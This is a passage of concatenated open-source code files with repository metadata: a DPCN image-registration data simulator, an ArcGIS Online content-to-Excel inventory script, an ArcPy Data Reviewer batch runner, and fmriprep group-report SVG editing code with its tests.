# image = cv2.warpAffine(image, M, (w, h))
# image = cv2.resize(image, (h, w), interpolation=cv2.INTER_CUBIC)
np_image_data = np.asarray(image)
image_tensor = trans(np_image_data)
scaling_factor = 1
if change_scale:
center = torch.ones(1,2)
center[:, 0] = h // 2
center[:, 1] = w // 2
scaling_factor = torch.tensor(np.random.rand()*0.2+1)
angle_source = torch.ones(1) * 0.
scale_source = torch.ones(1) * scaling_factor
image_tensor = image_tensor.unsqueeze(0)
rot_mat = kornia.get_rotation_matrix2d(center, angle_source, scale_source)
image_tensor = kornia.warp_affine(image_tensor, rot_mat, dsize=(h, w))
image_tensor = image_tensor.squeeze(0)
# image = Image.open(path)
# image = image.convert("1")
# # image.show()
# image = image.resize((128,128))
# image_tensor = trans(image)
return image_tensor, angle, translation, scaling_factor, h_original, w_original
def get_gt_tensor(this_gt, size):
this_gt = this_gt +180
gt_tensor_self = torch.zeros(size,size)
angle_convert = this_gt*size/360
angle_index = angle_convert//1 + (angle_convert%1+0.5)//1
if angle_index.long() == size:
angle_index = size-1
gt_tensor_self[angle_index,0] = 1
else:
gt_tensor_self[angle_index.long(),0] = 1
# print("angle_index", angle_index)
return gt_tensor_self
```
#### File: DPCN/data/simulation.py
```python
import cv2
import numpy as np
import random
try:
import scipy.ndimage.interpolation as ndii
except ImportError:
import ndimage.interpolation as ndii
import matplotlib.pyplot as plt
def generate_random_data(height, width, count):
x, y, gt, trans = zip(*[generate_img_and_rot_img(height, width) for i in range(0, count)])
X = np.asarray(x) * 255
X = X.repeat(1, axis=1).transpose([0, 2, 3, 1]).astype(np.uint8)
Y = np.asarray(y) * 100
Y = Y.repeat(1, axis=1).transpose([0, 2, 3, 1]).astype(np.uint8)
return X, Y, gt, trans
def generate_img_and_rot_img(height, width):
shape = (height, width)
triangle_location = get_random_location(*shape)
triangle_location1 = get_random_location(*shape)
triangle_location2 = get_random_location(*shape)
circle_location1 = get_random_location(*shape, zoom=0.7)
circle_location2 = get_random_location(*shape, zoom=0.5)
circle_location3 = get_random_location(*shape, zoom=0.9)
mesh_location = get_random_location(*shape)
square_location = get_random_location(*shape, zoom=0.8)
plus_location = get_random_location(*shape, zoom=1.2)
plus_location1 = get_random_location(*shape, zoom=1.2)
plus_location2 = get_random_location(*shape, zoom=1.2)
plus_location3 = get_random_location(*shape, zoom=1.2)
plus_location4 = get_random_location(*shape, zoom=1.2)
# Create input image
arr = np.zeros(shape, dtype=bool)
arr = add_triangle(arr, *triangle_location)
arr = add_triangle(arr, *triangle_location1)
arr = add_triangle(arr, *triangle_location2)
arr = add_circle(arr, *circle_location1)
arr = add_circle(arr, *circle_location2, fill=True)
arr = add_circle(arr, *circle_location3)
arr = add_mesh_square(arr, *mesh_location)
arr = add_filled_square(arr, *square_location)
arr = add_plus(arr, *plus_location)
arr = add_plus(arr, *plus_location1)
arr = add_plus(arr, *plus_location2)
arr = add_plus(arr, *plus_location3)
arr = np.reshape(arr, (1, height, width)).astype(np.float32)
angle = np.random.rand() * 180
t_x = (np.random.rand()-0.5) * 50.
t_y = (np.random.rand()-0.5) * 50.
trans = np.array((t_y, t_x))
if angle < -180.0:
angle = angle + 360.0
elif angle > 180.0:
angle = angle - 360.0
# arr = arr[0,]
# rot = ndii.rotate(arr, angle)
(_, h, w) = arr.shape
(cX, cY) = (w//2, h//2)
rot = arr[0,]
N = np.float32([[1,0,t_x],[0,1,t_y]])
rot = cv2.warpAffine(rot, N, (w, h))
M = cv2.getRotationMatrix2D((cX, cY), angle, 1.0)
rot = cv2.warpAffine(rot, M, (w, h))
rot = cv2.resize(rot, (h, w), interpolation=cv2.INTER_CUBIC)
# for heterogeneous image, comment out if you want them to be homogeneous
rot = cv2.GaussianBlur(rot, (9,9), 13)
kernel = np.array([[-1,-1,-1],[-1,9,-1],[-1,-1,-1]])
rot = cv2.filter2D(rot, -1, kernel)
rot = rot[np.newaxis, :]
# for dynamic obstacles, comment out if you dont want any dynamic obstacles
# arr[0,] = add_plus(arr[0], *plus_location4)
# arr = np.reshape(arr, (1, height, width)).astype(np.float32)
return arr, rot, angle, trans
def add_square(arr, x, y, size):
s = int(size / 2)
arr[x-s,y-s:y+s] = True
arr[x+s,y-s:y+s] = True
arr[x-s:x+s,y-s] = True
arr[x-s:x+s,y+s] = True
return arr
def add_filled_square(arr, x, y, size):
s = int(size / 2)
xx, yy = np.mgrid[:arr.shape[0], :arr.shape[1]]
return np.logical_or(arr, logical_and([xx > x - s, xx < x + s, yy > y - s, yy < y + s]))
def logical_and(arrays):
new_array = np.ones(arrays[0].shape, dtype=bool)
for a in arrays:
new_array = np.logical_and(new_array, a)
return new_array
def add_mesh_square(arr, x, y, size):
s = int(size / 2)
xx, yy = np.mgrid[:arr.shape[0], :arr.shape[1]]
return np.logical_or(arr, logical_and([xx > x - s, xx < x + s, xx % 2 == 1, yy > y - s, yy < y + s, yy % 2 == 1]))
def add_triangle(arr, x, y, size):
s = int(size / 2)
triangle = np.tril(np.ones((size, size), dtype=bool))
arr[x-s:x-s+triangle.shape[0],y-s:y-s+triangle.shape[1]] = triangle
return arr
def add_circle(arr, x, y, size, fill=False):
xx, yy = np.mgrid[:arr.shape[0], :arr.shape[1]]
circle = np.sqrt((xx - x) ** 2 + (yy - y) ** 2)
new_arr = np.logical_or(arr, np.logical_and(circle < size, circle >= size * 0.7 if not fill else True))
return new_arr
def add_plus(arr, x, y, size):
s = int(size / 2)
arr[x-1:x+1,y-s:y+s] = True
arr[x-s:x+s,y-1:y+1] = True
return arr
def get_random_location(width, height, zoom=1.0):
x = int(width * random.uniform(0.22, 0.78))
y = int(height * random.uniform(0.22, 0.78))
size = int(min(width, height) * random.uniform(0.06, 0.12) * zoom)
return (x, y, size)
```
#### File: DPCN/log_polar/polar.py
```python
def get_pixel_value(img, x, y):
"""
Utility function to get pixel value for coordinate
vectors x and y from a 4D tensor image.
Input
-----
- img: tensor of shape (B, H, W, C)
- x: flattened tensor of shape (B*H*W,)
- y: flattened tensor of shape (B*H*W,)
Returns
-------
- output: tensor of shape (B, H, W, C)
"""
shape = tf.shape(x)
batch_size = shape[0]
height = shape[1]
width = shape[2]
batch_idx = tf.range(0, batch_size)
batch_idx = tf.reshape(batch_idx, (batch_size, 1, 1))
b = tf.tile(batch_idx, (1, height, width))
indices = tf.stack([b, y, x], 3)
return tf.gather_nd(img, indices)
def affine_grid_generator(height, width, theta):
"""
This function returns a sampling grid, which when
used with the bilinear sampler on the input feature
map, will create an output feature map that is an
affine transformation [1] of the input feature map.
Input
-----
- height: desired height of grid/output. Used
to downsample or upsample.
- width: desired width of grid/output. Used
to downsample or upsample.
- theta: affine transform matrices of shape (num_batch, 2, 3).
For each image in the batch, we have 6 theta parameters of
the form (2x3) that define the affine transformation T.
Returns
-------
- normalized grid (-1, 1) of shape (num_batch, 2, H, W).
The 2nd dimension has 2 components: (x, y) which are the
sampling points of the original image for each point in the
target image.
Note
----
[1]: the affine transformation allows cropping, translation,
and isotropic scaling.
"""
num_batch = tf.shape(theta)[0]
# create normalized 2D grid
x = tf.linspace(-1.0, 1.0, width)
y = tf.linspace(-1.0, 1.0, height)
x_t, y_t = tf.meshgrid(x, y)
# flatten
x_t_flat = tf.reshape(x_t, [-1])
y_t_flat = tf.reshape(y_t, [-1])
# reshape to [x_t, y_t , 1] - (homogeneous form)
ones = tf.ones_like(x_t_flat)
sampling_grid = tf.stack([x_t_flat, y_t_flat, ones])
# repeat grid num_batch times
sampling_grid = tf.expand_dims(sampling_grid, axis=0)
sampling_grid = tf.tile(sampling_grid, tf.stack([num_batch, 1, 1]))
# cast to float32 (required for matmul)
theta = tf.cast(theta, 'float32')
sampling_grid = tf.cast(sampling_grid, 'float32')
# transform the sampling grid - batch multiply
batch_grids = tf.matmul(theta, sampling_grid)
# batch grid has shape (num_batch, 2, H*W)
# reshape to (num_batch, H, W, 2)
batch_grids = tf.reshape(batch_grids, [num_batch, 2, height, width])
return batch_grids
def bilinear_sampler(img, x, y):
"""
Performs bilinear sampling of the input images according to the
normalized coordinates provided by the sampling grid. Note that
the sampling is done identically for each channel of the input.
To test if the function works properly, output image should be
identical to input image when theta is initialized to identity
transform.
Input
-----
- img: batch of images in (B, H, W, C) layout.
- grid: x, y which is the output of affine_grid_generator.
Returns
-------
- out: interpolated images according to grids. Same size as grid.
"""
H = tf.shape(img)[1]
W = tf.shape(img)[2]
max_y = tf.cast(H - 1, 'int32')
max_x = tf.cast(W - 1, 'int32')
zero = tf.zeros([], dtype='int32')
# rescale x and y to [0, W-1/H-1]
x = tf.cast(x, 'float32')
y = tf.cast(y, 'float32')
x = 0.5 * ((x + 1.0) * tf.cast(max_x-1, 'float32'))
y = 0.5 * ((y + 1.0) * tf.cast(max_y-1, 'float32'))
# grab 4 nearest corner points for each (x_i, y_i)
x0 = tf.cast(tf.floor(x), 'int32')
x1 = x0 + 1
y0 = tf.cast(tf.floor(y), 'int32')
y1 = y0 + 1
# clip to range [0, H-1/W-1] to not violate img boundaries
x0 = tf.clip_by_value(x0, zero, max_x)
x1 = tf.clip_by_value(x1, zero, max_x)
y0 = tf.clip_by_value(y0, zero, max_y)
y1 = tf.clip_by_value(y1, zero, max_y)
# get pixel value at corner coords
Ia = get_pixel_value(img, x0, y0)
Ib = get_pixel_value(img, x0, y1)
Ic = get_pixel_value(img, x1, y0)
Id = get_pixel_value(img, x1, y1)
# recast as float for delta calculation
x0 = tf.cast(x0, 'float32')
x1 = tf.cast(x1, 'float32')
y0 = tf.cast(y0, 'float32')
y1 = tf.cast(y1, 'float32')
# calculate deltas
wa = (x1-x) * (y1-y)
wb = (x1-x) * (y-y0)
wc = (x-x0) * (y1-y)
wd = (x-x0) * (y-y0)
# add dimension for addition
wa = tf.expand_dims(wa, axis=3)
wb = tf.expand_dims(wb, axis=3)
wc = tf.expand_dims(wc, axis=3)
wd = tf.expand_dims(wd, axis=3)
# compute output
out = tf.add_n([wa*Ia, wb*Ib, wc*Ic, wd*Id])
return out
# import torch
# import cv2
# import torch.nn.functional as F
# import matplotlib.pyplot as plt
# import numpy as np
# import torchvision.models as models
# import torchvision.transforms as transforms
# import torch.nn as nn
# import torch
# import matplotlib
# import matplotlib.pyplot as plt
# theta = torch.Tensor([[0.707,0.707,0],[-0.707,0.707,0]]).unsqueeze(dim=0)
# img = cv2.imread('1.jpg',cv2.IMREAD_GRAYSCALE)
# plt.subplot(2,1,1)
# plt.imshow(img,cmap='gray')
# plt.axis('off')
# img = torch.Tensor(img).unsqueeze(0).unsqueeze(0)
# grid = F.affine_grid(theta,size=img.shape)
# print(np.shape(grid))
# print(grid)
# new_img_PIL = transforms.ToPILImage()(grid).convert('RGB')
# new_img_PIL.show()
# output = F.grid_sample(img,grid)[0].numpy().transpose(1,2,0).squeeze()
# plt.subplot(2,1,2)
# plt.imshow(output,cmap='gray')
# plt.axis('off')
# plt.show()
```
|
{
"source": "jessyd72/AGO-slicer",
"score": 3
}
|
#### File: jessyd72/AGO-slicer/agol_slicer.py
```python
import arcgis
from arcgis.gis import GIS, User
import json
import tkinter as tk
import xlsxwriter
from xlsxwriter import Workbook
def createWorkbook(output_dir, un):
''' Creates Excel workbook with sheet of
AGOL content for a user. Intended to be used
to create a slicer.'''
workbook = Workbook(output_dir)
sheet = workbook.add_worksheet('AGO Items-{}'.format(un))
sheet.write('A1','WebApp')
sheet.write('B1','WebMap')
sheet.write('C1','Feature Layer')
sheet.write('D1','Feature Service')
sheet.write('E1', 'Folder')
return(workbook, sheet)
def getUserCreds():
'''Gets AGO/Portal creds'''
def getUserInput():
'''Reads inputs from Tk object'''
global outputs
outputs = [item.get() for item in user_input]
root.destroy()
user_input = []
root = tk.Tk()
root.title('AGOL Credentials')
root.geometry('400x400')
for x in range(4):
inputs = tk.Entry(root)
inputs.grid(row = x, column=1)
if x == 0:
inputs.insert(0, 'https://arcgis.com')
if x == 2:
inputs.config(show='*')
user_input.append(inputs)
button = tk.Button(root, text='OK', command=getUserInput)
button.grid(row=4, column=0, pady=20)
label_url = tk.Label(root, text='AGOL/Portal URL ')
label_url.grid(row=0, column=0, pady=20)
label_un = tk.Label(root, text='Username ')
label_un.grid(row=1, column=0, pady=20)
label_pw = tk.Label(root, text='Password ')
label_pw.grid(row=2, column=0, pady=20)
label_pw = tk.Label(root, text='Output Excel Workbook ')
label_pw.grid(row=3, column=0, pady=20)
root.mainloop()
return(outputs)
def getContent(user):
'''Gets all items within a user's
AGO. Returns a dictionary of items,
Item ID : [Item Title, Item Type, Folder]'''
all_items = {}
# get users items (home)
for item in user.items():
if item.type != 'Code Attachment':
all_items[item.itemid] = [item.title, item.type, 'home', item]
folders = user.folders
for f in folders:
f_items = user.items(folder=f['title'])
for item in f_items:
if item.type != 'Code Attachment':
all_items[item.itemid] = [item.title, item.type, f['title'], item]
return(all_items)
def sortContent(items, content_types):
'''Sorts content into respective dictionaries
to write to Excel workbook in writeItems function.
Accesses any layers within a feature service.
maps, layers, tools, applications, datafiles'''
lyrs = {}
maps = {}
apps = {}
data = {}
tools = {}
for k, v in items.items():
item_id = k
item_title = v[0]
item_type = v[1]
item_loc = v[2]
item_obj = v[3]
item_cat = content_types[item_type]
if item_cat == 'layers':
layers = item_obj.layers
for l in layers:
service_url = (l.url).replace('ArcGIS', 'arcgis')
lyr_name = l.properties.name
# feature layer service url = [feature layer name, feature service id, feature service name, folder]
lyrs[service_url] = [lyr_name, item_id, item_title, item_loc]
if item_type == 'Map Service':
lyrs[item_obj.url] = [item_title, item_id, item_title, item_loc]
elif item_cat == 'maps':
op_lyrs = item_obj.get_data()['operationalLayers']
op_lyr_ids = [[l['title'], l['url'].replace('ArcGIS', 'arcgis')] for l in op_lyrs]
# web map id = [web map name, [feature layer name, feature layer service url]]
maps[item_id] = [item_title, op_lyr_ids, item_loc]
elif item_cat == 'applications':
# print(item_id)
# print(item_title)l
# print(item_type)
# print(item_loc)
map_in_app = ''
app_data = item_obj.get_data()
if 'map' in app_data.keys():
map_in_app = app_data['map']['itemId']
elif item_type == 'Dashboard' and 'widgets' in app_data.keys():
for d in app_data['widgets']:
if d['type'] == 'mapWidget':
map_in_app = d['itemId']
if map_in_app == '':
map_in_app = 'NA'
else:
map_in_app = 'NA'
# application name = [application id, web map id]
apps[item_title] = [item_id, map_in_app, item_loc]
elif item_cat == 'datafiles':
data[item_title] = [item_id, item_loc]
elif item_cat == 'tools':
tools[item_title] = [item_id, item_loc]
else:
continue
return(apps, maps, lyrs, data)
def writeItems(workbook, sheet, apps, maps, layers, data):
'''dooo itttt
feature layer service url = [feature layer name, feature service id, feature service name, folder]
web map id = [web map name, [feature layer name, feature layer service url]]
application name = [application id, web map id]'''
used_webmap = []
used_layers = []
row = 1
for k, v in apps.items():
app_name = k
map_id = v[1]
if map_id == 'NA':
row += 1
sheet.write('A{}'.format(str(row)), app_name)
else:
map_title = maps[map_id][0]
layer_list = maps[map_id][1]
for lyr in layer_list:
layer_name = lyr[0]
layer_url = lyr[1]
feature_service_name = layers[layer_url][2]
row += 1
sheet.write('A{}'.format(str(row)), app_name)
sheet.write('B{}'.format(str(row)), map_title)
sheet.write('C{}'.format(str(row)), layer_name)
sheet.write('D{}'.format(str(row)), feature_service_name)
used_webmap.append(map_id)
used_layers.append(layer_url)
unused_webmaps = list(set(maps.keys()) - set(used_webmap))
for wm in unused_webmaps:
map_title = maps[wm][0]
layer_list = maps[wm][1]
for lyr in layer_list:
layer_name = lyr[0]
layer_url = lyr[1]
feature_service_name = layers[layer_url][2]
row += 1
sheet.write('B{}'.format(str(row)), map_title)
sheet.write('C{}'.format(str(row)), layer_name)
sheet.write('D{}'.format(str(row)), feature_service_name)
used_layers.append(layer_url)
unused_layers = list(set(layers.keys()) - set(used_layers))
for l in unused_layers:
layer_name = layers[l][0]
feature_service_name = layers[l][2]
row += 1
sheet.write('C{}'.format(str(row)), layer_name)
sheet.write('D{}'.format(str(row)), feature_service_name)
workbook.close()
if __name__ == '__main__':
try:
# AGOL item types
print('loading dictionary...')
txt = open(r"C:\data\gtg-data\projects\_agol-slicer\AGO_items_by_group.json").read()
item_types = json.loads(txt)
print('getting credentials...')
creds = getUserCreds()
url = creds[0]
un = creds[1]
pw = creds[2]
out_xlsx = creds[3]
print('accessing AGO...')
gis = GIS(url, un, pw)
user = User(gis, un)
## future ref- can use gis.users.search() to get list
## of all users in org. Loop all users through the
## getContent funct to get whole org's content.
## consider new tab/df for each user
print('getting user''s content...')
item_dict = getContent(user)
print('organizing content by type...')
apps, maps, lyrs, data = sortContent(item_dict, item_types)
print('creating XLSX...')
wb, sh = createWorkbook(out_xlsx, un)
print('writing to XLSX...')
writeItems(wb, sh, apps, maps, lyrs, data)
except KeyError as e:
print(e)
print(lyrs)
print(maps)
print(apps)
```
|
{
"source": "jessyd72/batchjob-data-reviewer",
"score": 2
}
|
#### File: jessyd72/batchjob-data-reviewer/autoBatchJob-DataReview.py
```python
import arcpy
from arcpy import env
from arcpy.sa import *
import os
arcpy.CheckOutExtension("datareviewer")
# ------------------------------------------------------------------------------------------------------------------------
## Run data reviewer for database
# ------------------------------------------------------------------------------------------------------------------------
def runDataReview(workspace, spatRef, sessionName, polyRBJ, lineRBJ, pointRBJ, featureList, prodWorkspace):
# enable Data Reviewer in workspace
arcpy.EnableDataReviewer_Reviewer(workspace, spatRef)
# start reviewer session
session = arcpy.CreateReviewerSession_Reviewer(workspace, sessionName)
# grab geodatabase name from prodWorkspace
wDesc = arcpy.Describe(prodWorkspace)
gdbName, gdbExt = os.path.splitext(str(wDesc.name))
# Loop through provided feature classes and run appropriate
for feature in featureList.split(';'):
feature = feature.strip("'")
# describe feature to get shape type
featDesc = arcpy.Describe(feature)
# assign correct batch job check to var RBJfile based on geometry
if featDesc.shapeType == 'Polygon':
RBJfile = polyRBJ
elif featDesc.shapeType == 'Polyline':
RBJfile = lineRBJ
elif featDesc.shapeType == 'Point':
RBJfile = pointRBJ
else:
arcpy.AddMessage("Check %s shape type" % feature)
# get directory to RBJ file
dirRBJ = os.path.dirname(RBJfile)
# open read version of RBJfile as string
s = open(RBJfile).read()
# replace text with parameters
s1 = s.replace('FEATURE', featDesc.name)
s2 = s1.replace('GDBpath', prodWorkspace)
s3 = s2.replace('GDBname', gdbName)
# open new file to copy into
newBatchFile = open(dirRBJ + r"\%sBatchJob.RBJ" % featDesc.name, 'w')
# copy code over
newBatchFile.write(s3)
newBatchFile.close()
# get new batch job file path name
batchFilePath = dirRBJ + r"\%sBatchJob.RBJ" % featDesc.name
# run data reviewer
arcpy.AddMessage("Running %s check on %s" % (featDesc.shapeType, featDesc.name))
rev = arcpy.ExecuteReviewerBatchJob_Reviewer(workspace, session, batchFilePath, prodWorkspace)
# delete new batch file
os.remove(batchFilePath)
if __name__ == "__main__":
# inputs
workspace = arcpy.GetParameterAsText(0)
spatRef = arcpy.GetParameterAsText(1)
sessionName = arcpy.GetParameterAsText(2)
polyRBJ = arcpy.GetParameterAsText(3)
lineRBJ = arcpy.GetParameterAsText(4)
pointRBJ = arcpy.GetParameterAsText(5)
prodWorkspace = arcpy.GetParameterAsText(6)
featureList = arcpy.GetParameterAsText(7)
# module
runDataReview(workspace, spatRef, sessionName, polyRBJ, lineRBJ, pointRBJ, featureList, prodWorkspace)
```
|
{
"source": "JessyD/fmriprep-group-report",
"score": 3
}
|
#### File: fmriprep-group-report/fmriprepgr/_svg_edit.py
```python
from pathlib import Path
def _parse_figure(fig_path):
"""
Parse an fmriprep figure into header, background, middle, foreground, and tail.
Parameters
----------
fig_path: str
Path to the figure to parse
Returns
-------
header: list of str
Lines preceding the background image
background: list of str
Lines corresponding to the background image
middle: list of str
any lines occuring between the background and foreground lines
foreground: list of str
Lines corresponding to the foreground image
tail: list of str
Lines following the foreground image
"""
fig_path = Path(fig_path)
fig = fig_path.read_text()
fig_lines = fig.split("\n")
header = []
origbg = []
middle = []
origfg = []
tail = []
inhead = True
inorigbg = False
inmiddle = False
inorigfg = False
intail = False
for fl in fig_lines:
if fl.strip() == '<g class="background-svg">':
open_gs = 1
inhead = False
inorigbg = True
origbg.append(fl)
continue
elif fl.strip() == '<g class="foreground-svg">':
open_gs = 1
inmiddle = False
inorigfg = True
origfg.append(fl)
continue
elif inhead:
header.append(fl)
elif inmiddle:
middle.append(fl)
elif intail:
tail.append(fl)
elif inorigbg:
origbg.append(fl)
if '<g ' in fl:
open_gs += 1
if '</g>' in fl:
open_gs -= 1
if open_gs == 0:
inorigbg = False
inmiddle = True
elif inorigfg:
origfg.append(fl)
if '<g ' in fl:
open_gs +=1
if '</g>' in fl:
open_gs -= 1
if open_gs == 0:
inorigfg = False
intail = True
return header, origbg, middle, origfg, tail
def _flip_images(fig_path, new_path):
"""
Flip the foreground and background images
Parameters
----------
fig_path : str
Path to source image
new_path : str
Path for new image
"""
header, origbg, middle, origfg, tail = _parse_figure(fig_path)
new_path = Path(new_path)
newbg = origfg
newbg[0] = newbg[0].replace('foreground', 'background')
newfg = origbg
newfg[0] = newfg[0].replace('background', 'foreground')
new_svg = '\n'.join(header + newbg + middle + newfg + tail)
new_path.write_text(new_svg)
def _drop_image(fig_path, new_path, image_to_drop):
"""
Drop the foreground or background image. The background image is the one displayed before mousing over the svg.
Parameters
----------
fig_path : str
Path to source image
new_path : str
Path for new image
image_to_drop : str
Which image to drop, allowed values are "background", "foreground".
"""
if not image_to_drop in ['background', 'foreground']:
raise ValueError(f"image_to_drop must be one of ['background', 'foreground'], {image_to_drop} "
f"is not a valid option.")
header, origbg, middle, origfg, tail = _parse_figure(fig_path)
new_path = Path(new_path)
if image_to_drop == 'foreground':
newbg = origfg
newbg[0] = newbg[0].replace('foreground', 'background')
new_svg = '\n'.join(header + newbg + middle + tail)
new_path.write_text(new_svg)
else:
new_svg = '\n'.join(header + origbg + middle + tail)
new_path.write_text(new_svg)
```
#### File: fmriprepgr/test/test_reports.py
```python
from pathlib import Path
from shutil import copytree, rmtree
import numpy as np
import pandas as pd
import pytest
from ..reports import _make_report_snippet, parse_report, make_report
def test_make_report_snippet():
"""
Run `reports._make_report_snippet` and confirm that output is as expected by comparison to output previously stored
in this function.
Returns
-------
None
"""
row = {'idx':0,
'chunk':0,
'subject': '22293',
'acquisition': 'mprage',
'reconstruction': 'prenorm',
'run': 1,
'suffix': 'dseg',
'extension': '.svg',
'path': './sub-22293/figures/sub-22293_acq-mprage_rec-prenorm_run-1_dseg.svg',
'filename': 'sub-22293_acq-mprage_rec-prenorm_run-1_dseg.svg',
'run_title': 'Brain mask and brain tissue segmentation of the T1w',
'elem_caption': 'This panel shows the template T1-weighted image (if several T1w images were found), with contours delineating the detected brain mask and brain tissue segmentations.',
'space': np.nan,
'desc': np.nan,
'session': np.nan,
'task': np.nan,
'report_type': 'dseg'}
expected_output = ['<div id="id-0_filename-sub-22293_acq-mprage_rec-prenorm_run-1_dseg">',
'<script type="text/javascript">',
'var subj_qc = {"idx": 0, "chunk": 0, "subject": "22293", "acquisition": "mprage", "reconstruction": "prenorm", "run": 1, "suffix": "dseg", "space": NaN, "desc": NaN, "session": NaN, "task": NaN, "report_type": "dseg", "been_on_screen": false, "rater": NaN, "report": NaN, "note": NaN}',
'</script>',
'<h2>idx-0: subject <span class="bids-entity">22293</span>, acquisition <span class="bids-entity">mprage</span>, reconstruction <span class="bids-entity">prenorm</span>, run <span class="bids-entity">1</span>, suffix <span class="bids-entity">dseg</span></h2>',
'<div class="radio">',
'<label><input type="radio" name="inlineRadio0" id="inlineRating1" value="1" onclick="qc_update(0, \'report\', this.value)"> Good </label>',
'<label><input type="radio" name="inlineRadio0" id="inlineRating0" value="0" onclick="qc_update(0, \'report\', this.value)"> Bad</label>',
'</div>',
'<p> Notes: <input type="text" id="box0" oninput="qc_update(0, \'note\', this.value)"></p>',
'<object class="svg-reportlet" type="image/svg+xml" data="./sub-22293/figures/sub-22293_acq-mprage_rec-prenorm_run-1_dseg.svg"> </object>',
'</div>',
'<script type="text/javascript">',
'subj_qc["report"] = -1',
'subjs.push(subj_qc)',
'</script>'
]
output = _make_report_snippet(row)
output = [oo.strip() for oo in output.split('\n') if len(oo.strip()) > 0]
assert np.all([aa == bb for aa,bb in zip(expected_output, output)])
def test_parse_report():
"""
Run `reports.parse_report` on sub-20900test.html and confirm that output is as expected by comparison to previously
saved output.
Returns
-------
None
"""
test_data_dir = Path(__file__).parent.resolve() / 'data'
output = parse_report(test_data_dir / 'fmriprep/sub-20900.html')
expected_output = pd.read_csv(test_data_dir / 'sub-20900test.csv')
expected_output['subject'] = expected_output.subject.astype(str)
assert expected_output.equals(output)
def test_make_report(tmp_path):
test_out_dir = tmp_path
test_data_dir = Path(__file__).parent.resolve() / 'data/fmriprep'
test_fmriprep_dir = test_out_dir / 'fmriprep'
copytree(test_data_dir, test_out_dir / 'fmriprep')
with pytest.raises(ValueError):
ret = make_report([test_fmriprep_dir.as_posix()])
def test_fmriprepgr(tmp_path, script_runner):
test_out_dir = tmp_path
test_data_dir = Path(__file__).parent.resolve() / 'data/fmriprep'
test_fmriprep_dir = test_out_dir / 'fmriprep'
copytree(test_data_dir, test_fmriprep_dir)
# get rid of the expected outputs
rmtree(test_fmriprep_dir / 'group')
ret = script_runner.run('fmriprepgr', test_fmriprep_dir.as_posix())
assert ret.success
expected_out_dir = test_data_dir / 'group'
out_dir = test_fmriprep_dir / 'group'
expected_files = sorted(expected_out_dir.glob('*'))
out_files = sorted(out_dir.glob('*'))
expected_file_names = np.array([pp.parts[-1] for pp in expected_files])
out_file_names = np.array([pp.parts[-1] for pp in out_files])
assert (expected_file_names == out_file_names).all()
# test that html files are generated correctly
for of, ef in zip(out_files, expected_files):
if ef.as_posix().split('.')[-1] == 'html':
econtent = ef.read_text()
ocontent = of.read_text()
assert ocontent == econtent
# test that links are valid
out_links = sorted((out_dir / 'sub-20900' / 'figures').glob('*'))
out_links += sorted((out_dir / 'sub-22293' / 'figures').glob('*'))
for ll in out_links:
assert ll.exists()
def test_fmriprepgr_batches(tmp_path, script_runner):
test_out_dir = tmp_path
test_data_dir = Path(__file__).parent.resolve() / 'data/fmriprep'
test_fmriprep_dir = test_out_dir / 'fmriprep'
copytree(test_data_dir, test_fmriprep_dir)
# get rid of the expected outputs
rmtree(test_fmriprep_dir / 'group')
ret = script_runner.run('fmriprepgr', '--reports_per_page=1', test_fmriprep_dir.as_posix())
assert ret.success
expected_out_dir = test_data_dir / 'group_batch'
out_dir = test_fmriprep_dir / 'group'
expected_files = sorted(expected_out_dir.glob('*'))
out_files = sorted(out_dir.glob('*'))
expected_file_names = np.array([pp.parts[-1] for pp in expected_files])
out_file_names = np.array([pp.parts[-1] for pp in out_files])
assert (expected_file_names == out_file_names).all()
# test that html files are generated correctly
for of, ef in zip(out_files, expected_files):
if ef.as_posix().split('.')[-1] == 'html':
econtent = ef.read_text()
ocontent = of.read_text()
assert ocontent == econtent
# test that links are valid
out_links = sorted((out_dir / 'sub-20900' / 'figures').glob('*'))
out_links += sorted((out_dir / 'sub-22293' / 'figures').glob('*'))
for ll in out_links:
assert ll.exists()
def test_fmriprepgr_mod(tmp_path, script_runner):
test_out_dir = tmp_path
test_data_dir = Path(__file__).parent.resolve() / 'data/fmriprep'
test_fmriprep_dir = test_out_dir / 'fmriprep'
copytree(test_data_dir, test_fmriprep_dir)
# get rid of the expected outputs
rmtree(test_fmriprep_dir / 'group')
ret = script_runner.run('fmriprepgr', '-f MNI152NLin6Asym', '--drop_background=pepolar', test_fmriprep_dir.as_posix())
assert ret.success
expected_out_dir = test_data_dir / 'group_mod'
out_dir = test_fmriprep_dir / 'group'
expected_files = sorted(expected_out_dir.glob('*'))
out_files = sorted(out_dir.glob('*'))
expected_file_names = np.array([pp.parts[-1] for pp in expected_files])
out_file_names = np.array([pp.parts[-1] for pp in out_files])
assert (expected_file_names == out_file_names).all()
# test that html files are generated correctly
for of, ef in zip(out_files, expected_files):
if ef.as_posix().split('.')[-1] in ['html', 'svg']:
econtent = ef.read_text()
ocontent = of.read_text()
assert ocontent == econtent
# test that links are valid
out_links = sorted((out_dir / 'sub-20900' / 'figures').glob('*'))
out_links += sorted((out_dir / 'sub-22293' / 'figures').glob('*'))
for ll in out_links:
assert ll.exists()
```
#### File: fmriprepgr/test/test_svg_edit.py
```python
from pathlib import Path
from .._svg_edit import _flip_images, _drop_image
def test_flip(tmp_path):
orig_path = (Path(__file__).parent.resolve()
/ 'data/svg_edit/sub-22293_acq-mprage_rec-prenorm_run-1_space-MNI152NLin6Asym_T1w.svg')
new_path = tmp_path / 'flipped.svg'
expected_path = (Path(__file__).parent.resolve()
/ 'data/svg_edit/sub-22293_acq-mprage_rec-prenorm_run-1_space-MNI152NLin6Asym_T1w_flipped.svg')
_flip_images(orig_path, new_path)
expected_svg = expected_path.read_text()
output_svg = new_path.read_text()
assert expected_svg == output_svg
def test_dropfg(tmp_path):
orig_path = (Path(__file__).parent.resolve()
/ 'data/svg_edit/sub-22293_acq-mprage_rec-prenorm_run-1_space-MNI152NLin6Asym_T1w.svg')
new_path = tmp_path / 'dropfg.svg'
expected_path = (Path(__file__).parent.resolve()
/ 'data/svg_edit/sub-22293_acq-mprage_rec-prenorm_run-1_space-MNI152NLin6Asym_T1w_dropfg.svg')
_drop_image(orig_path, new_path, 'foreground')
expected_svg = expected_path.read_text()
output_svg = new_path.read_text()
assert expected_svg == output_svg
def test_dropbg(tmp_path):
orig_path = (Path(__file__).parent.resolve()
/ 'data/svg_edit/sub-22293_acq-mprage_rec-prenorm_run-1_space-MNI152NLin6Asym_T1w.svg')
new_path = tmp_path / 'dropbg.svg'
expected_path = (Path(__file__).parent.resolve()
/ 'data/svg_edit/sub-22293_acq-mprage_rec-prenorm_run-1_space-MNI152NLin6Asym_T1w_dropbg.svg')
